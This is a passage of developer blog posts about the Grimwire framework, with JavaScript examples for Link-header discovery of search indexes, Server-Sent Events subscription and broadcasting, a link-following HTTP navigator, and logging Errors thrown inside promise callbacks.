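// Hypothetical helper: return the href of the first link carrying the
// given relation (a rel attribute may hold several space-separated values).
function findByRel(links, rel) {
    for (var i = 0; i < links.length; i++) {
        var rels = (links[i].rel || '').split(/\s+/);
        if (rels.indexOf(rel) !== -1)
            return links[i].href;
    }
    return null;
}

// Example header, as a made-up app might return it from its startpage
var header = '<httpl://mail.usr/>; rel="self", ' +
    '<httpl://mail.usr/index>; rel="http://grimwire.com/rel/index"; title="Mail index"';
var indexUrl = findByRel(parseLinkHeader(header), 'http://grimwire.com/rel/index');
```

If no link carries the relation, findByRel returns null, which is the case where the application simply has nothing to index.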

Getting the Data

The next step is to get the docs and to watch them for updates in the future.

function addSource(sourceUrl) {
    resolveSourceIndex(sourceUrl).succeed(function(indexUrl) {
        getSourceDocuments(sourceUrl, indexUrl);
        local.http.subscribe(indexUrl).on('update', function() {
            getSourceDocuments(sourceUrl, indexUrl);
        });
    });
}

This allows applications to trigger re-indexing so they can maintain freshness.

getSourceDocuments() issues a GET request for JSON. It expects the response to be an object whose items attribute is populated with an array of objects, according to this schema:

{
    items: required array of {
        href: required url (primary key),
        title: required string,
        desc: optional string,
        category: optional string
    }
}

This data will be used to populate the search dataset and to render results. The use of this schema is implied by the "http://grimwire.com/rel/index" relation, which is why the custom relation is used instead of the standard "index" relation.
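If you're exporting an index from your own app, it can help to check the document against the schema before serving it. A minimal sketch follows; validateIndexDoc is a hypothetical helper, not something the Search app exposes, and it only checks types since the schema above doesn't say more than that.

```javascript
// Hypothetical validator for the index schema described above.
// Returns an array of problems; an empty array means the document is usable.
function validateIndexDoc(doc) {
    var errors = [];
    if (!doc || !Array.isArray(doc.items))
        return ['items: required array'];
    doc.items.forEach(function(item, i) {
        if (!item || typeof item !== 'object') {
            errors.push('items[' + i + ']: must be an object');
            return;
        }
        // href doubles as the primary key, so it must be a non-empty string
        if (typeof item.href !== 'string' || !item.href)
            errors.push('items[' + i + '].href: required url');
        if (typeof item.title !== 'string')
            errors.push('items[' + i + '].title: required string');
        ['desc', 'category'].forEach(function(key) {
            if (item[key] !== undefined && typeof item[key] !== 'string')
                errors.push('items[' + i + '].' + key + ': optional string');
        });
    });
    return errors;
}

// Example: the second item is missing its title
var problems = validateIndexDoc({
    items: [
        { href: 'httpl://mail.usr/1', title: 'Hello', category: 'mail' },
        { href: 'httpl://mail.usr/2' }
    ]
});
```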

Wrapping Up

The two tools in use here are Server-Sent Events for syncing and the navigator for discovery. By listening to the event-stream of the config server's applications, the Search app can react to new programs. Likewise, by listening to the indexes of the apps, Search can keep its data-set fresh. Meanwhile, by looking for the "http://grimwire.com/rel/index" relation in Link headers, Search can discover what data to index and expect a specific schema.

These techniques can be used in your applications, and are not restricted to Worker servers. Server-Sent Events are an HTML5 standard and the Link response header is a standard part of HTTP (RFC 5988), so any remote host can leverage the same tools.

Read more at github.com/grimwire/grimwire.

Syncing with Server-Sent Events

Server-Sent Events are a recent HTML5 addition which allows web apps to open and listen to event-streams from remote servers. Grimwire uses SSEs as a tool to keep programs and interfaces in sync. This post will give a quick overview of the APIs and how they can be used.

local.http.subscribe()

This function takes a url and issues a GET request for the "text/event-stream" type. If targeting a remote server, it will leverage BrowserRemoteEventStream. Otherwise, it issues an HTTPL request and manually watches for updates on the stream. From your perspective, it all looks like this:

var stream = local.http.subscribe('httpl://foo.usr/some/resource');
stream.on('update', function(e) {
    console.log(e.data);
});
stream.on(['foo','bar'], function(e) {
    console.log(e.event); // 'foo' or 'bar'
});
// ...
stream.close(); // client-side disconnect

In keeping with browser implementations, closing the event stream (from the server or the client) will emit an 'error' event with an undefined e.data.
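For reference, the "text/event-stream" format itself is plain text: each event is a block of "event:" and "data:" lines ended by a blank line. Here's a simplified parser to show the shape of it. This is a sketch, not how Local reads streams: parseEventStream is a hypothetical name, it ignores "id:", "retry:" and comment lines, assumes "\n" line endings, and leaves the data as a string.

```javascript
// Simplified text/event-stream parser (hypothetical, for illustration).
// Handles "event:" and "data:" fields only and assumes "\n" line endings.
function parseEventStream(text) {
    var events = [];
    text.split('\n\n').forEach(function(block) {
        var name = 'message'; // default event name when no "event:" line is present
        var data = [];
        block.split('\n').forEach(function(line) {
            var m = /^(event|data): ?(.*)$/.exec(line);
            if (!m) return;
            if (m[1] === 'event') name = m[2];
            else data.push(m[2]);
        });
        // blocks without any data lines are not dispatched
        if (data.length)
            events.push({ event: name, data: data.join('\n') });
    });
    return events;
}

var parsedEvents = parseEventStream(
    'event: update\ndata: {"n":1}\n\n' +
    'event: foo\ndata: a\ndata: b\n\n'
);
```

Multiple "data:" lines in one block are joined with newlines, which is how a server can send multi-line payloads.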

navigator.subscribe()

If you find yourself needing to navigate to the event-stream, you can use navigator.subscribe(), which promises the EventStream interface:

local.http.navigator('httpl://foo.usr')
    .collection('some')
    .item('resource')
    .subscribe()
    .then(function(stream) {
        stream.on('foo', onFoo);
    });

data-subscribe

Grimwire doesn't allow any javascript to enter the document, meaning there's no client-side code. To create rich realtime UIs, servers use some added response directives, content-types, and HTML behaviors. One of the most common of these is the "data-subscribe" attribute.

<div data-subscribe="httpl://someserver.usr/some/resource">
    <p>This was last updated at 10:27:54</p>
</div>
<p>This will not be updated.</p>

Any element with this attribute will open an event-stream to the target and listen for the "update" event. Every time this occurs, the client region will issue a GET request to the same resource, then replace its innerHTML with the response. You can think of this as triggering targeted page-refreshes.

If the content of the refresh is at a different location than the event-stream, you can specify that URL afterward.

<div data-subscribe="httpl://foo.usr/bar httpl://foo.usr/buz">

Lastly, if the "data-subscribe" attribute is set on a form element, the form's "accept" attribute will be used, and its inputs will be enumerated in the query parameters of the request. This can be used to push up information about the client state.
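The non-form behavior boils down to something like the sketch below. To be clear, this is not Grimwire's implementation: parseDataSubscribe and bindRegion are hypothetical names, and the subscribe and getHtml functions are passed in as stand-ins (subscribe is assumed to return an object with on(), like local.http.subscribe(); getHtml is assumed to return a promise for the response HTML).

```javascript
// Hypothetical helper: split "eventsUrl [contentUrl]" into its parts.
// With one URL, the same resource serves both the events and the content.
function parseDataSubscribe(attr) {
    var urls = attr.trim().split(/\s+/);
    return { eventsUrl: urls[0], contentUrl: urls[1] || urls[0] };
}

// Hypothetical wiring: refresh the element whenever an "update" arrives.
// subscribe and getHtml are injected so the sketch has no dependencies.
function bindRegion(el, subscribe, getHtml) {
    var target = parseDataSubscribe(el.getAttribute('data-subscribe'));
    subscribe(target.eventsUrl).on('update', function() {
        getHtml(target.contentUrl).then(function(html) {
            el.innerHTML = html; // the targeted "page refresh"
        });
    });
}

var one = parseDataSubscribe('httpl://foo.usr/bar');
var two = parseDataSubscribe('httpl://foo.usr/bar httpl://foo.usr/buz');
```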

local.http.broadcaster()

On the server end of things, you'll need to track any event-stream responses you have open so that you can write events to them. Grimwire gives you local.http.broadcaster() to help with this.

// This server is an open event relay
// - it rebroadcasts any data POSTed to it
var mybroadcast = local.http.broadcaster();
function main(request, response) {
    if (/event-stream/.test(request.headers.accept)) {
        response.writeHead(200, 'ok', {
            'content-type':'text/event-stream'
        });
        mybroadcast.addStream(response);
        // NOTE: don't call end() on the response!
    }
    else if (request.method == 'POST') {
        response.writeHead(204, 'no content').end();
        mybroadcast.emit('post', request.body);
        // ^ will broadcast to all open streams
    } else
        response.writeHead(400, 'bad request').end();
}

You can read more about its api in the Local documentation.
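If you're curious what a broadcaster has to do, the idea fits in a few lines. The sketch below is a stand-in written for illustration, not Local's code: makeBroadcaster is a hypothetical name, and it assumes each response object has a write() method that accepts a string chunk.

```javascript
// Hypothetical stand-in for a broadcaster (NOT Local's implementation).
// Assumes each response object has a write(string) method.
function makeBroadcaster() {
    var streams = [];
    return {
        // remember an open event-stream response
        addStream: function(response) {
            streams.push(response);
        },
        // forget a response, eg after the client disconnects
        removeStream: function(response) {
            var i = streams.indexOf(response);
            if (i !== -1) streams.splice(i, 1);
        },
        // write one event, in text/event-stream framing, to every open stream
        emit: function(eventName, data) {
            var payload = (data === undefined) ? '' : JSON.stringify(data);
            var chunk = 'event: ' + eventName + '\n' +
                        'data: ' + payload + '\n\n';
            streams.forEach(function(response) {
                response.write(chunk);
            });
        }
    };
}
```

Because JSON.stringify escapes newlines inside strings, the payload always fits on a single "data:" line.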

Wrapping up

Server-Sent Events are a very useful tool for synchronizing programs with other programs and with their interfaces. Consumers can access them using the subscriber APIs, and servers can broadcast them from any URL. Combining their "push" architecture with REST's "pull" requests makes it possible to build tightly-synced applications without tight coupling.

Read more at github.com/grimwire/grimwire.

Sunday, May 5, 2013

Programmatic Web-browsing with http.Navigator

Did you know there's an HTTP response header called "Link"?

> HEAD / HTTP/1.1
> Host: pfraze.blogspot.com

< HTTP/1.1 200 OK
< Link: <http://pfraze.blogspot.com/2013>; rel="collection"; title="2013"

It describes resources which have some relationship to the current one, primarily through the "href" (the URL in angle brackets), the "rel" attribute (a keyword describing the relationship), and the "title" attribute. Grimwire's local.http.Navigator object makes use of it by searching the rel values and titles:

local.http.navigator('http://pfraze.blogspot.com')
    .collection('2013') // find a {rel=collection, title=2013} link
    .collection('05') // find a {rel=collection, title=05} link
    .item('programmatic-web-browsing-with-http-navigator')
    // ^ find a {rel=item, title=programmatic...} link
    .getJson();

Each navigation is lazy: the HEAD requests are only issued once the program asks the navigator to make a request. In the example above, "getJson()" would have triggered this traffic:

> HEAD / HTTP/1.1
< HTTP/1.1 200 OK
< Link: <http://pfraze.blogspot.com/2013>; rel="collection"; title="2013"

> HEAD /2013 HTTP/1.1
< HTTP/1.1 200 OK
< Link: <http://pfraze.blogspot.com/2013/05>; rel="collection"; title="05"

> HEAD /2013/05 HTTP/1.1
< HTTP/1.1 200 OK
< Link: <http://pfraze.blogspot.com/2013/05/programmatic-web-browsing-with-http-navigator>; rel="item"; title="programmatic-web-browsing-with-http-navigator"

> GET /2013/05/programmatic-web-browsing-with-http-navigator HTTP/1.1
...

There's one round-trip per navigation, but, since Grimwire runs Web servers within the browser, a lot of that traffic will be at a negligible latency.

To avoid enumerating every possible link, the navigator also uses URI Templates:

Link: <http://pfraze.blogspot.com/{title}>; rel="collection"

This would result in the exact same behavior as above. Grimwire first tries to find a link that matches both rel and title. If it doesn't find that, but does find a link with a matching rel-type and no title attribute, it'll use that. This allows you to spec out your URI scheme generally, rather than enumerating every reachable URI.

More extensive templates, with more variables, can also be used:

local.http.navigator('http://pfraze.blogspot.com')
    .collection('posts', { tags:'grimwire' })
    .getJson()
// > HEAD http://pfraze.blogspot.com
// < Link: <http://pfraze.blogspot.com/{title}{?tags}>; rel="collection"
// > GET http://pfraze.blogspot.com/posts?tags=grimwire

If any navigation fails to find a matching link, the navigator rejects the response promise with a 404.
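The matching rules (exact rel and title first, then a rel match with no title, then template expansion) can be sketched like this. The function names are hypothetical and this isn't the navigator's source; the template expander only understands the {name} and {?a,b} forms, which is a small subset of URI Templates.

```javascript
// Hypothetical: pick a link by rel and title.
// Exact rel+title match wins; otherwise use a same-rel link with no title.
function selectLink(links, rel, title) {
    var fallback = null;
    for (var i = 0; i < links.length; i++) {
        if (links[i].rel !== rel) continue;
        if (links[i].title === title) return links[i];
        if (links[i].title === undefined && !fallback) fallback = links[i];
    }
    return fallback;
}

// Hypothetical: expand only the {name} and {?a,b} forms of URI Templates.
function expandTemplate(template, vars) {
    return template.replace(/\{(\??)([^}]+)\}/g, function(_, isQuery, names) {
        var keys = names.split(',');
        if (!isQuery)
            return encodeURIComponent(vars[keys[0]] !== undefined ? vars[keys[0]] : '');
        var pairs = keys
            .filter(function(k) { return vars[k] !== undefined; })
            .map(function(k) { return k + '=' + encodeURIComponent(vars[k]); });
        return pairs.length ? '?' + pairs.join('&') : '';
    });
}

// Hypothetical: one navigation step. Returns null when nothing matches,
// which is where the navigator would reject with a 404.
function resolveHref(links, rel, title, params) {
    var link = selectLink(links, rel, title);
    if (!link) return null;
    var vars = { title: title };
    for (var k in params) vars[k] = params[k];
    return expandTemplate(link.href, vars);
}

var links = [{ href: 'http://pfraze.blogspot.com/{title}{?tags}', rel: 'collection' }];
var href = resolveHref(links, 'collection', 'posts', { tags: 'grimwire' });
// href is 'http://pfraze.blogspot.com/posts?tags=grimwire'
```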

Advantages:
  • No manual URI construction.
  • Less out-of-band client knowledge - with the links, the server can change URIs at any time, possibly routing to other hosts or new URI schemes.
  • By default, a 404 will not be retried, reducing traffic in a failure condition.

Tips:
  • Generally, only link to items which are "adjacent" in the resource hierarchy. (/a should link to / and /a/b, but not /a/b/c). This is because a subsequent navigation can accomplish the same thing, and it's easier to describe links that are 1 hop away in relevance.
  • A Grimwire Worker server can describe the Link header as an array of objects. The attributes map directly to the standard Link definition, but also include the "href" key, which specifies the URL. For instance, [{href:"http://pfraze.blogspot.com/{title}", rel:"collection"}]
  • More documentation can be found at grimwire.com.

Maintain error output in Promises/A+

The Promises/A+ spec requires that exceptions thrown in a callback be caught and used to reject the enclosing promise. Unfortunately, JavaScript exceptions cover programming mistakes (typos) along with application-level faults, so those mistakes get swallowed silently.

promise(someAsync()).then(function(result) {
    return resul.doSomething(); // typo, never gets logged
}).then(function(result2) {
    // never gets called!
});

How do you catch programming errors when using promises? If you're in Chrome, you can set the debugger to stop on all exceptions, but that's not ideal. If you maintain the promise lib, try this:

var newValue;
try { newValue = fn(parentPromise.value); }
catch (e) {
    if (e instanceof Error) {
        if (console.error)
            console.error(e, e.stack);
        else console.log("Promise exception thrown", e, e.stack);
    }
    targetPromise.reject(e);
}

And tada, you now have a stack dump logged with your errors. Most application-level rejections are not Error types (eg throw "not found") so the noise stays pretty near to expectations.
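If you want to try the idea outside of a promise lib, here's a self-contained version. It's a sketch under assumptions: runHandler is a hypothetical name, and targetPromise is assumed to be any object with fulfill() and reject() methods (your lib's internals will differ).

```javascript
// Hypothetical helper: run a then() callback, log real Errors, and settle
// the target promise. targetPromise is assumed to have fulfill() and reject().
function runHandler(fn, value, targetPromise, logger) {
    logger = logger || console;
    var newValue;
    try { newValue = fn(value); }
    catch (e) {
        // only Error instances are logged, so `throw "not found"` stays quiet
        if (e instanceof Error)
            logger.error(e, e.stack);
        targetPromise.reject(e);
        return;
    }
    targetPromise.fulfill(newValue);
}

// A fake promise and logger, just to watch what happens
var outcome = {};
var fakePromise = {
    fulfill: function(v) { outcome = { state: 'fulfilled', value: v }; },
    reject: function(e) { outcome = { state: 'rejected', value: e }; }
};
var logged = [];
var fakeLogger = { error: function(e) { logged.push(e); } };

runHandler(function(result) {
    return resul.doSomething(); // typo: throws a ReferenceError, which gets logged
}, {}, fakePromise, fakeLogger);
```

Only the fn() call sits inside the try block, so an exception thrown while fulfilling the target promise isn't mistaken for a handler error.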